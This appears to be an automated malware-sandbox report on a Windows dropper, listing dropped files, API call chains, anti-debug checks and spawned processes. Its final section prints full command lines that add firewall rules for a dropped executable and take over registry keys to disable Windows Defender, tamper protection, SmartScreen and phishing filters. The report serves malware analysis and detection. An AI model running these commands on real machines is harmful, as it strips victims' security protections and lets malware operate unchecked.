Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	File created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\PowerRun64.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe

Code function: 7_2_00007FF686861DAC GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

7_2_00007FF686861DAC

Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\win_version_csharp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\nsExec.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SelfDel.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\PowerRun64.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_7-43542

Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	API coverage: 9.9 %
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	API coverage: 10.0 %

Source: C:\Users\user\Desktop\4hIPvzV6a2.exe TID: 7164

Thread sleep count: 145 > 30

Jump to behavior

Source: C:\Windows\System32\conhost.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Code function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C63
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Code function: 0_2_004068B4 FindFirstFileW,FindClose,	0_2_004068B4
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Code function: 0_2_00402910 FindFirstFileW,	0_2_00402910
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF68687C76C _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,	7_2_00007FF68687C76C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF6868496D0 FindFirstFileW,GetLastError,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	7_2_00007FF6868496D0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF68685CF15 MoveFileExW,FindFirstFileW,GetLastError,FindNextFileW,DeleteFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	7_2_00007FF68685CF15
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF68687C76C _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,	11_2_00007FF68687C76C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF6868496D0 FindFirstFileW,GetLastError,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	11_2_00007FF6868496D0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF68685CF15 MoveFileExW,FindFirstFileW,GetLastError,FindNextFileW,DeleteFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	11_2_00007FF68685CF15

Source: SetACL64.exe, 00000008.00000002.1714613888.000002638C5E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRR2]P
Source: SetACL64.exe, 00000009.00000002.1716021658.000001530DE68000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 0000000A.00000002.1717257209.000001C366348000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 0000000B.00000002.1719792112.000001FBFF408000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 0000000C.00000002.1721350752.000001CAB6A28000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 0000000D.00000002.1727160550.00000251B90E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: netsh.exe, 00000003.00000002.1710218463.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000003.00000003.1709848128.0000000000A31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
Source: netsh.exe, 00000001.00000003.1707240401.00000000011C1000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000001.00000002.1707623146.00000000011C4000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 00000007.00000002.1713569639.00000244CD3D4000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 0000000E.00000002.1728315087.000001FD9D649000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\4hIPvzV6a2.exe

API call chain: ExitProcess graph end node

graph_0-3066

Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe

Code function: 7_2_00007FF6868686C8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_00007FF6868686C8

Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe

Code function: 7_2_00007FF68687D744 GetProcessHeap,

7_2_00007FF68687D744

Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF6868686C8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00007FF6868686C8
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF686863034 SetUnhandledExceptionFilter,	7_2_00007FF686863034
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF686862E8C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00007FF686862E8C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF686862AE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00007FF686862AE0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF6868686C8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00007FF6868686C8
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF686863034 SetUnhandledExceptionFilter,	11_2_00007FF686863034
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF686862E8C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00007FF686862E8C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF686862AE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00007FF686862AE0

Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=oofzzwcvgbcojt dir=in action=allow program="C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe" enable=yes profile=public,private	Jump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=oofzzwcvgbcojt dir=out action=allow program="C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe" enable=yes profile=public,private	Jump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\bn.bat	Jump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\bn1.bat	Jump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Process created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
